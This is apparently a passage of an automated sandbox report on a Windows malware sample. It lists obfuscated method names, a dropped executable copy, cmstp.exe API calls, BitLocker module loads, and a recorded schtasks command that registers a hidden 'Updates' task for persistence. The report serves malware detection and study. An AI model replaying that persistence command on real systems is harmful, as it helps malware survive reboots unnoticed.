Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, EkrIvB3I9wExmE28cl.cs	High entropy of concatenated method names: 'QQCF3F8ROb', 'hO8F5VqPQd', 'eHIBdeZT43', 'KvdBPOgdOD', 'hXTBCBSAOp', 'TuQBGOBhvS', 'X7YBW5UUU4', 'G0OB8AQ0wg', 'KgkBODr5mA', 'ql7BXQmD0e'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, DT3o8gwtuyu0LrAWfMt.cs	High entropy of concatenated method names: 'dLIIRv7VVG', 'w91IU8pLgX', 'T33IsSVYkn', 'R9yIyGRQp6', 'ITiI3T5gme', 'BLrIToc9a4', 'd0GI520Orb', 'QloI7L1xuN', 'nvhIjJiqaV', 'm5CIcUPyZx'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, opEsZ4pJhyjIm973pF.cs	High entropy of concatenated method names: 'EimQugddkv', 'rJPQmXuQ61', 'wnfYnPQk23', 'ABlYlV4Jfs', 'y0ZQHnqlfy', 'QwMQrHuOA7', 'RKhQvAq720', 'JBJQqE9R5K', 'QQBQk9fa6C', 'HhqQN4cKhV'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	High entropy of concatenated method names: 's6BE1PaVy4', 'Rf7E2BVMio', 'B9cEoUOWNi', 'ge8EBpLaQ4', 'J0YEFRtTHj', 'htgEZOJoJD', 'miVELZM6UT', 'D4xEh2Qf8a', 'ECXE04G6Y4', 'LvLEgk4CDy'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, kZRL9UOKx7K27Jjnos.cs	High entropy of concatenated method names: 'l1tIlTEtYN', 'g1bIEIUKNJ', 'c2pIw7tR5p', 'zmFI2ke7Bd', 'dofIoFhRGd', 'ORjIFyEmC4', 'w43IZwo15k', 'BDHYfvkvEM', 'A8SYuUJlFR', 'KPJY9wqoWT'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, xPllKBLhQH8lHhsjeB.cs	High entropy of concatenated method names: 'A2WBynoad9', 'GmkBTF5KF9', 'nueB7pegSM', 'BwoBjXoMQZ', 'oTFBxaCasm', 'r4fBijHYhJ', 'beBBQ2CDqs', 'V2oBYSVvNU', 'IZMBIBFLGX', 'b5CBbydCaj'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, iyQSdP6fG08SuG6VIh.cs	High entropy of concatenated method names: 'anbA7ox7g4', 'xsxAjfVWuy', 'BfqAJN1bL0', 'Y9KAKtMQNV', 'onwAPie7UX', 'ARYACN0K9b', 'gpYAWHBThP', 'rmmA8Jn81Z', 'PVnAXnSf6d', 'wRgAHwVCvb'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, X9eccBc5Dt5k3rGVxW.cs	High entropy of concatenated method names: 'XPYsGA3H9', 'kv0yN6pMW', 'rX9T7DPyF', 'cXK5AHPsR', 'rcbjMJN9L', 'GfMckvqYc', 'w4qZOZb5cJiP7kl3xR', 'dOhPqHfHGwX4MO4fhZ', 'GioYmundS', 'tHybFy0ku'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, GVPBj5maNPvgsSelfB.cs	High entropy of concatenated method names: 'HUkYJEFR6C', 'P1OYKOkoKU', 'VmNYdjFvmt', 'dV4YPxWLel', 'LlaYqH73kE', 'ndwYCuq5ED', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, rI8oRl0304FYKiqT7i.cs	High entropy of concatenated method names: 'fT8LRRx26N', 'iNMLUV5CM5', 't2CLsV7Qvc', 'wOBLyMJnx8', 'GrVL3f7clY', 'lEfLTZb5BO', 'GTjL548OVp', 'gPgL7FnBUV', 'KSXLjQuejT', 'Yd3Lc6GqrT'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, Ol1IBa46vOHO6Lbv3R.cs	High entropy of concatenated method names: 'ToString', 'flwiHaWGjJ', 'ojviKNH5ot', 'VxFidDlImY', 'HoqiPQhLU6', 'O0ciC3A3yr', 'xReiGJGAZ6', 'XcbiWWwTx3', 'RTii82ykZs', 'dDuiO7CZEd'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, DtoaUbN21nmdWp4qvk.cs	High entropy of concatenated method names: 'G6iZVqOCyY', 'H7QZRDiQcF', 'pvHZsmW9Xw', 'tFjZyH1ZbJ', 'cKbZTeDMK3', 'VMbZ5gmqhb', 'vTyZjv2psn', 'McXZcLbkbh', 'UQnKTl8A91u9XAoRD0q', 'eueLgO8tCifMeTaauYY'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, tI2Ee6Hrx4vF3IxHYw.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dpDa9wmyZa', 'BQEamRapWg', 'gslazlpAxI', 'QOSEnCjT1M', 'Uq6El9dYB4', 'I9yEaGgTgx', 'WCiEEDKomO', 'FiEj8qksbVJ3EKAHrei'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, NFEe2GVrrotLL1L3mO.cs	High entropy of concatenated method names: 'hHeZ1Vt9ZR', 'iNyZowklIy', 'S5EZFw6jUL', 'OTRZL35MMO', 'IhZZhQRnQF', 'y7YFMPn2Ww', 'LDsFSUpc79', 't1oFfDxMSM', 'JDuFugHDSg', 'AjfF9jjw7o'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, Mmsu5AigAdJeUuP32P.cs	High entropy of concatenated method names: 'PdfoqtYiJk', 'jqjokL1N85', 'gGsoNI93JN', 'Rq4o6pGfHw', 'R3noMQh4NB', 'nEHoSicmTm', 'aU5ofiDiSy', 'D2IouvGbWX', 'O6Ro9kMy4s', 'Ne9omLRZck'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, AmZDsXwKIkqpTOmNRcW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YaVbq1FIJb', 'W7rbkrEAma', 'WFPbN9fNHY', 'YESb6o7eOt', 'FmtbMyb9ZD', 'FCHbSL1T1D', 'KlKbfREeSM'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, NLaMbueC4R79hXESWU.cs	High entropy of concatenated method names: 'nccxXdFjVl', 'bpmxrrL66k', 'dn0xqtTEaw', 'J9uxk5lyLn', 'q6AxKMtaRV', 'K2SxdipC78', 'GyYxPO9okj', 'tWmxCEhND1', 'OuCxG3HbLo', 'GwfxWqSqbN'

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

File created: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CB634 LoadStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileIntW,LoadStringW,MessageBoxW,CmFree,CmFree,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LoadStringW,MessageBoxW,memset,memset,memset,RegOpenKeyExW,RegQueryValueExW,ExpandEnvironmentStringsW,lstrcmpiW,LoadStringW,MessageBoxW,RegCloseKey,LoadStringW,RegCreateKeyW,lstrlenW,RegSetValueExW,LoadStringW,MessageBoxW,RegCloseKey,RegCloseKey,memset,memset,CopyFileW,LoadStringW,MessageBoxW,GetOSVersion,GetOSMajorVersion,CmMalloc,memset,CmFree,CmMalloc,memset,GetLastError,CmFree,lstrlenW,CmMalloc,lstrlenW,CmFree,CmFree,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,LoadStringW,MessageBoxExW,CmMalloc,memset,CmFree,CmMalloc,	13_2_003CB634
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CD233 RegOpenKeyExW,GetPrivateProfileIntW,GetSystemDirectoryW,memset,GetPrivateProfileStringW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,memset,RegEnumValueW,RegCloseKey,	13_2_003CD233
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CDD1E memset,memset,memset,memset,LoadStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,RegCreateKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,lstrlenW,memset,lstrlenW,lstrlenW,RegSetValueExW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,CmMalloc,CreateFileW,CloseHandle,CmFree,CmFree,GetPrivateProfileIntW,SetFileAttributesW,SHFileOperationW,RegCloseKey,RegCloseKey,	13_2_003CDD1E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CA47F RegOpenKeyExW,RegQueryValueExW,GetPrivateProfileIntW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,	13_2_003CA47F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CA068 memset,memset,RegOpenKeyExW,RegQueryValueExW,lstrcmpiW,LoadStringW,MessageBoxW,RegCloseKey,GetPrivateProfileIntW,GetPrivateProfileIntW,LoadStringW,LoadStringW,LoadStringW,MessageBoxW,GetSystemDirectoryW,	13_2_003CA068
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CCAB4 GetSystemDirectoryW,memset,GetPrivateProfileStringW,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,CmFree,	13_2_003CCAB4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003C5DEC memset,GetPrivateProfileStringW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcAddress,GetProcAddress,FreeLibrary,	13_2_003C5DEC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CA6EE GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,LoadStringW,LoadStringW,lstrlenW,lstrlenW,lstrlenW,LoadStringW,LoadStringW,MessageBoxW,LoadStringW,GetSystemDirectoryW,LoadStringW,MessageBoxW,	13_2_003CA6EE

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
